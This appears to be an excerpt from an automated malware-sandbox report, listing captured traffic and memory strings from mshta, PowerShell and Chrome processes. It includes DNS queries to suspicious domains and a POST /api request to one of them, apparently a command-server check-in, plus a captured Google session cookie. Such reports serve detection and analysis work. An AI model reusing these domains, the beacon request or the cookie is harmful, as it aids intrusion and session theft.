Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000003.57225858403.0000781C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C02418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000009.00000003.57225858403.0000781C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C02418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: savecoupons.shop
Source: global traffic DNS traffic detected: DNS query: journal.liveview.pw
Source: global traffic DNS traffic detected: DNS query: surmisehotte.click
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
Source: global traffic TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/40096371
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/40096608
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/40096838
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/40644627
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/40644912
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/41488637
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42261924
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42263580
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42264193
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42264287
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42264571
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42265509
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42266194
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42266231
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42266232
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/42266842
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294691129.0000781C031A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crbug.com/941620
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: chrome.exe, 00000009.00000002.57289091865.0000781C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285755859.0000781C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286086306.0000781C0233C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 00000009.00000002.57298031858.0000781C03578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 00000009.00000002.57285322841.0000781C0227D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: powershell.exe, 00000003.00000002.56221594211.000000000583E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000009.00000002.57298407737.0000781C03604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: powershell.exe, 00000003.00000002.56217685265.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
Source: chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: chrome.exe, 00000009.00000002.57285322841.0000781C02254000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000009.00000002.57300803464.0000781C039AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288885941.0000781C02928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300803464.0000781C039AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
